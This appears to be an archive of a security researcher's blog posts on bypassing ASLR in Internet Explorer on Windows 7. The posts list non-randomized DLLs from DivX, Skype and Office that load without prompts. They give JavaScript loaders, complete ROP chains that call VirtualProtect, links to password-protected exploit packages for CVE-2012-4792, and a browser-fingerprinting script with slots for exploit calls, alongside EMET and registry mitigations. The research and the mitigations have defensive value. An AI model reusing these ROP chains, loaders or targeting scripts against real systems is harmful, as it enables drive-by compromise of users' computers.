ASLR

All posts tagged ASLR

This is just a short post highlighting a couple of products that if installed could be used to bypass ASLR in Internet Explorer.

  • DivX Player 10.0.2
  • Yahoo Messenger 11.5.0.228
  • AOL Instant Messenger 7.5.14.8

These products contain a number of libraries that does not get ASLRed when loaded in memory due to not being compiled with the dynamicbase flag. These libraries can easily be loaded in Internet Explorer as they get registered on the system to run without permissions therefore no prompts are given. Below are the lists of libraries that can be loaded via ProgID or ClassID.

Dll     - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll
ProgID  - OVSHelper.OVSHelperCOM.1
ClassID - C6E31427-FD7E-4C53-B568-124B191E5DC4
Version - 1.1.0.12
-
Dll     - C:\Program Files\DivX\DivX Web Player\npdivx32.dll
ProgID  - npdivx.DivXBrowserPlugin.1
ClassID - 67DABFBF-D0AB-41FA-9C46-CC0F21721616
Version - 3.0.1.5
-
Dll     - C:\Program Files\DivX\DivX Web Player\npdivx32.dll
ProgID  - nprovi.RoviStreamPlayer.1
ClassID - 7F64C4F7-2D43-42fe-B7E7-CE5873E7D8B6
Version - 3.0.1.5
-
Dll     - C:\Program Files\Yahoo!\Messenger\YPagerChecker.dll
ProgID  - YPagerChecker.MessengerChecker.1
ClassID - DA4F543C-C8A9-4E88-9A79-548CBB46F18F
Version - 1.1.0.3
-
Dll     - C:\Program Files\AIM\isAim.dll
ProgID  - isaim.aimlocator.1
ClassID - BAEB32D0-732D-11D2-8BF4-0060B0A4A9EA
Version - 2.0.0.0

To view which libraries that can be loaded without permission go to “Manage Add-ons” which can be accessed from Internet Explorer – Tools – Manage Add-ons and choose “Run without permission” in the show dropdown list.

The below script you can use to test if any of these libraries get loaded or just click here to run it now. Libraries taking base address 0×10000000 will get rebased if one is already loaded. Note that for the Yahoo Messenger object check does not work so will fail but the library will still get loaded if installed. Also depending where you download AOL Instant Messenger the latest version is 8.0.6.1 which does not contain isAim.dll library.

<HTML>
<SCRIPT language="JavaScript"> 
//
if (DivX1() == "DivX")
{
   document.write("DivX VOD Helper Plug-in npovshelper.dll loaded<br>");
}
if (DivX2() == "DivX")
{
   document.write("DivX Web Player (DivXBrowserPlugin) npdivx32.dll loaded<br>");
}
if (DivX3() == "DivX")
{
   document.write("DivX Web Player (RoviStreamPlayer) npdivx32.dll loaded<br>");
}
if (Aol() == "AIM")
{
   document.write("AOL Messenger isAim.dll loaded<br>");
}
if (Yahoo() == "YahooM")
{
   document.write("Yahoo Messenger YPagerChecker.dll loaded<br>");
}
//
function DivX1() 
{
   var divxver = "";
   var divx = 0;
   var err = 0;
   try {
         divx = new ActiveXObject("OVSHelper.OVSHelperCOM.1") 
   } catch (err) {
      document.write("DivX VOD Helper Plug-in npovshelper.dll failed<br>");
   }
   if ((typeof divx) == "object") {
      divxver = "DivX";
   }
   return divxver;
}
function DivX2() 
{
   var divxver = "";
   var divx = 0;
   var err = 0;
   try {
         divx = new ActiveXObject("npdivx.DivXBrowserPlugin.1")
   } catch (err) {
      document.write("DivX Web Player (DivXBrowserPlugin) npdivx32.dll failed<br>");
   }
   if ((typeof divx) == "object") {
      divxver = "DivX";
   }
   return divxver;
}
function DivX3() 
{
   var divxver = "";
   var divx = 0;
   var err = 0;
   try {
         divx = new ActiveXObject("nprovi.RoviStreamPlayer.1")
   } catch (err) {
      document.write("DivX Web Player (RoviStreamPlayer) npdivx32.dll failed<br>");
   }
   if ((typeof divx) == "object") {
      divxver = "DivX";
   }
   return divxver;
}
function Aol() 
{
   var aolver = "";
   var aol = 0;
   var err = 0;
   try {
         aol = new ActiveXObject("isaim.aimlocator.1")
   } catch (err) {
      document.write("AOL Messenger isAim.dll failed<br>");
   }
   if ((typeof aol) == "object") {
      aolver = "AIM";
   }
   return aolver;
}
function Yahoo() 
{
   var yahoover = "";
   var yahoo = 0;
   var err = 0;
   try {
         yahoo = new ActiveXObject("YPagerChecker.MessengerChecker.1")  
   } catch (err) {
      document.write("Yahoo Messenger YPagerChecker.dll failed<br>");
   }
   if ((typeof yahoo) == "object") {
      yahoover = "YahooM";
   }
   return yahoover;
}
</SCRIPT>
</HTML>

Checking with Process Explorer you’ll see something like this

There are a number of mitigations available so bypassing ASLR using modules not set with the dynamicbase bit should be old news by now.

  • Install Microsoft EMET which supports multiple mitigation technologies, one being Mandatory Address Space Layout Randomization (ASLR) forcing module addresses to be randomized for a target process
  • Upgrade to Internet Explorer 10 or 11 where additional patches will be installed enabling it to use ForceASLR on Windows 7
  • Upgrade to Windows 8 which supports ForceASLR where Internet Explorer tells the OS to randomize all modules loaded by the browser
  • Disable the libraries from “Manage Add-ons”

Running Internet Explorer 10/11 or EMET all addresses will get randomized as you can see below

While investigating an unrelated issue using SysInternals Autoruns tool I spotted a couple of protocol handlers installed on the system by Skype. Knowing that protocol handlers can be loaded by Internet Explorer without any prompts I decided to check if these libraries have there dynamic base bits set. It turns out that the “skype4com.dll” library has not which means it could be used to bypass Windows ASLR so I got to work writing my rop chain and testing it out.

A quick test to see if it indeed loads up can be done from the code below

<SCRIPT language="JavaScript">  
location.href = 'skype4com:'
</SCRIPT>

Filename - Skype4COM.dll
Path     - C:\Program Files\Common Files\Skype\
MD5 hash - 6e04c50ca4a3fa2cc812cd7ab84eb6d7
Size     - 2,156,192 bytes
Signed   - 03 November 2011 11:46:40
Version  - 1.0.38.0

and here is my rop chain without any nulls.

 0x28025062   # POP EBX # RETN
 0xa13fcde1   # 0xA13FCDE1
 0x28024f71   # POP EAX # RETN
 0x5ec03420   # 0x5EC03420
 0x28027b5c   # ADD EBX,EAX # XOR EAX,EAX # RETN (EBX=0x201, 513 bytes)
 0x28024f71   # POP EAX # RETN
 0xa13fcde1   # 0xA13FCDE1
 0x280b4654   # ADD EAX,5EC0325F # RETN
 0x28099a83   # MOV EDX,EAX # MOV EAX,ESI # POP ESI # RETN (EDX=0x40)
 0x41414141   # Compensate
 0x28017271   # POP ECX # RETN
 0x280de198   # VirtualProtect() pointer [IAT]
 0x28027b5b   # MOV EAX,DWORD PTR DS:[ECX] # RETN
 0x28041824   # XCHG EAX,ESI # ADD EAX,48C48300 # RETN 0x08
 0x2806405a   # POP EBP # RETN
 0x41414141   # Compensate
 0x41414141   # Compensate
 0x280bc55b   # & push esp # ret 
 0x28017271   # POP ECX # RETN
 0x28126717   # &Writable location
 0x28098730   # POP EDI # RETN
 0x28098731   # RETN (ROP NOP)
 0x28024f71   # POP EAX # RETN
 0x90909090   # nop
 0x28043527   # PUSHAD # RETN

I’ve created an exploit using this rop chain on the “CButton Object Use-After-Free vulnerability” (CVE-2012-4792) taken from Metasploit. It has been tested on Windows 7 Enterprise (32bit) in VM with the latest version of Skype installed (6.2.59.106). The exploit can be downloaded from here, the password is “exploit” and the md5 hash of the zip file is 4d5735ff26b769abe1b02f74e2871911

Mitigation? Well I said it before and I’ll say it again . . . “EMET” your machines ASAP :-)

On something off topic, I was looking at the html code posted on Pastebin for the CVE-2012-4792 exploit and liked the way it checked to see if Office 2010 or 2007 was installed. Some blog posts weren’t as clear as to what the Office check routine was actually doing but really it was just determining which hxds.dll version to use for its rop chain for the Office version it detected. (I haven’t got the actual exploit files to confirm though but I’m pretty sure).

For Office 2010 it installs 4 OpenDocuments ActiveX objects

SharePoint.OpenDocuments.4
SharePoint.OpenDocuments.3
SharePoint.OpenDocuments.2
SharePoint.OpenDocuments.1

and Office 2007 only 3

SharePoint.OpenDocuments.3
SharePoint.OpenDocuments.2
SharePoint.OpenDocuments.1

So basically if the JavaScript is able to load “SharePoint.OpenDocuments.4″ then it knows that it’s Office 2010. Since these ActiveX controls can be run without permissions no prompts are given. Below is a simple script that could be used if say in this example checking Windows 7 with IE8 has got installed Office 2007/2010 or Java 6. No Skype ActiveX controls gets installed that can be run without permissions so I couldn’t work out how to check if Skype is installed without triggering prompts in Internet Explorer. If you do know how to check without triggering prompts please do share.

<HTML>
<SCRIPT language="JavaScript"> 
//
//
if (CheckIEOSVersion() == "ie8w7")
{
   if (CheckOfficeVersion() == "Office2010")
   {
//     Exploit call here
   }
   else if (CheckOfficeVersion() == "Office2007")
   {
//     Exploit call here
   }
   else if (JavaVersion() == "Java6")
   {
//     Exploit call here
   }
   else if (SkypeCheck() == "")
   {
//     Exploit call here
   }
}
//
//
function CheckIEOSVersion()
{
   var agent = navigator.userAgent.toUpperCase();
   var os_ie_ver = "";
//
   if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 7') > -1)) 
      os_ie_ver = "ie7wxp";  
   if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 8') > -1))
      os_ie_ver = "ie8wxp";
   if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 7') > -1))
      os_ie_ver = "ie7wv";   
   if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 8') > -1)) 
      os_ie_ver = "ie8wv";
   if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 8') > -1)) 
      os_ie_ver = "ie8w7";   
   if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 9') > -1)) 
      os_ie_ver = "ie9w7";
   if ((agent.indexOf('NT 6.2') > -1)&&(agent.indexOf('MSIE 10') > -1)) 
      os_ie_ver = "ie10w8"; 
   return os_ie_ver;
}
//
//
function CheckOfficeVersion()
{
   var offver = "";
   var checka = 0;
   var checkb = 0;
//
   try {
         checka = new ActiveXObject("SharePoint.OpenDocuments.4");  
   } catch (e) {}
   try {
         checkb = new ActiveXObject("SharePoint.OpenDocuments.3");  
   } catch (e) {}
//
   if ((typeof checka) == "object" && (typeof checkb) == "object")
     offver = "Office2010";
   else if ((typeof checka) == "number" && (typeof checkb) == "object") 
     offver = "Office2007";
//
   return offver;
}
//
//
function JavaVersion() 
{
   var javver = "";
   var javaa = 0;
//
   try {
         javaa = new ActiveXObject("JavaWebStart.isInstalled.1.6.0.0");  
   } catch (e) {}
//
   if ((typeof javaa) == "object")
       javver = "Java6";
//
   return javver;
}
//
//
function SkypeCheck()
{
   var skypever = "";
   return skypever;
}
//
//
</SCRIPT>
</HTML> 

Exploiting vulnerabilities on Windows 7 is not as easy as it used to be on Windows XP. Writing an exploit to bypass ASLR and DEP on Windows 7 was still relatively easy if Java 6 was installed as it got shipped with non aslr msvcr71.dll library. Now that Java 7 has been out for a while hopefully everyone should be using this version as msvcr71.dll does not exist with Java 7. With this in mind creating a reliable ROP chain is going to be difficult again as finding some information leak my guess is not going to be a straight forward not to mention the time it would take to create our ROP chain if a leak even exists. So I set myself the task to see if I could create a reliable static ROP chain on a fully patched Windows 7 machine with and without Microsoft Office.

Windows 7 only

After carrying out a default installation of Windows 7 sp1 (Enterprise) and getting it all up-to-date with patches I carried out a scan of all non aslr DLLs on the system and was amazed to find nearly 600 non alsr DLLs. Ok a lot were duplicates so removing these from my list I ended up with around 200 unique DLLs to play with. One way I thought I could possibly load the library in Internet Explorer is by calling a classid object tag so after searching for clsid string in the DLLs one library stood out “VsaVb7rt.dll”

Filename - VsaVb7rt.dll
Path     - C:\Windows\Microsoft.NET\Framework\v2.0.50727\
MD5 hash - 22f450c23d8abdfa6bed991ad1c34b1c
Size     - 1,340,752 bytes
Signed   - 29th September 2010 08:46:12

After obtaining the classid guid using the tool Bintext I loaded it up in the browser

<HTML>
<OBJECT classid='clsid:A138CF39-2CAE-42c2-ADB3-022658D79F2F' </OBJECT>
</HTML>

The issue with loading libraries via guids is that user interaction is first required before exploiting so in the real world this would not be a viable option unless your testing your own exploits from a specific address.

Once accepting the security warning it writes to the registry entry below

Windows 7 with MSOffice 2007/2010

With Windows 7 being a failure I turned my attention to Office 2007. As most users running Windows 7 should be running Office 2010 or the very least running Office 2007. After a default installation of “Microsoft Office 2007 Plus”, getting it fully up-to-date and carrying a another scan a number of additional non aslr DLLs where found that could be loaded via its own guids as above but again pretty useless with the prompts given. After browsing/grepping the strings in the libraries I found one library that could be loaded in Internet Explorer without any interaction and that library being “hxds.dll” :-). This library can be loaded using its protocol handler by location.href = ‘ms-help:’

<SCRIPT language="JavaScript"> 
   location.href = 'ms-help:'
</SCRIPT>

This library does not get rebased either so is perfect for our ROP chain. Carrying out the same routine with “Microsoft Office 2010 Plus” I found the same library “hxds.dll” that we can use but our ROP chain would be different as the file has been updated.

Details of the library on Office 2007

Filename - hxds.dll
Path     - C:\Program Files\Common Files\microsoft shared\Help\
MD5 hash - 9e7370cc3d6a43942433f85d0e2bbdd8
Size     - 873,216 bytes
Signed   - 19th August 2006 11:52:41

Details of the library on Office 2010

Filename - hxds.dll
Path     - C:\Program Files\Common Files\microsoft shared\Help\
MD5 hash - 23fdb0c309e188a5e3c767f8fc557d83
Size     - 877,368 bytes
Signed   - 23rd May 2009 12:24:33

Here is the ROP chain generated by Mona.py on Office 2007

 0x51be25dc, # POP EDI # RETN [hxds.dll]
 0x51bd1158, # ptr to &VirtualProtect() [IAT hxds.dll]
 0x51c3098e, # MOV EAX,DWORD PTR DS:[EDI] # RETN [hxds.dll]
 0x51c39987, # XCHG EAX,ESI # RETN [hxds.dll]
 0x51bf1761, # POP EBP # RETN [hxds.dll]
 0x51c4b2df, # & call esp [hxds.dll]
 0x51bf2e19, # POP EBX # RETN [hxds.dll]
 0x00000201, # 0x00000201-> ebx
 0x51bfa969, # POP EDX # RETN [hxds.dll]
 0x00000040, # 0x00000040-> edx
 0x51c385a2, # POP ECX # RETN [hxds.dll]
 0x51c5b991, # &Writable location [hxds.dll]
 0x51bf7b52, # POP EDI # RETN [hxds.dll]
 0x51c3f011, # RETN (ROP NOP) [hxds.dll]
 0x51c433d7, # POP EAX # RETN [hxds.dll]
 0x90909090, # nop
 0x51c0a4ec, # PUSHAD # RETN [hxds.dll]

and the ROP chain on Office 2010

 0x51bf34b4, # POP ESI # RETN [hxds.dll]
 0x51bd10b8, # ptr to &VirtualProtect() [IAT hxds.dll]
 0x51bd2d97, # MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll]
 0x51bdcba0, # XCHG EAX,ESI # RETN 00 [hxds.dll]
 0x51c379e2, # POP EBP # RETN [hxds.dll]
 0x51c59683, # & call esp [hxds.dll]
 0x51be198c, # POP EBX # RETN [hxds.dll]
 0x00000201, # 0x00000201-> ebx
 0x51c35ac3, # POP EDX # RETN [hxds.dll]
 0x00000040, # 0x00000040-> edx
 0x51becf3e, # POP ECX # RETN [hxds.dll]
 0x51c5d150, # &Writable location [hxds.dll]
 0x51bef563, # POP EDI # RETN [hxds.dll]
 0x51c07402, # RETN (ROP NOP) [hxds.dll]
 0x51c56fbd, # POP EAX # RETN [hxds.dll]
 0x90909090, # nop
 0x51c3604e, # PUSHAD # RETN [hxds.dll]

In order for our exploit to be successful I’ve seen its best to call the protocol handler after the heap spray and before triggering the vulnerability. Finally here is an exploit (password “answerworks”, md5hash 5bc94894890298710f30d91d6104e568) based from my last post where I have just changed the ROP chain from using msvcr71.dll to using hxds.dll. For now I see two options to mitigate this, one is to disable the protocol handler which can be done easily by changing the name or value in the registry or delete it completely. The downside is that I don’t know how it would impact applications using this handler.

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-help]
@="Help HxProtocol"
"CLSID"="{314111c7-a502-11d2-bbca-00c04f8ec294}"

The second option would be to get Microsoft EMET installed if you haven’t already done so and make sure “MandatoryASLR” is enabled for the iexplore.exe process. I can’t emphasize enough how vital it is to have this tool installed so please do not delay and get it deployed ASAP.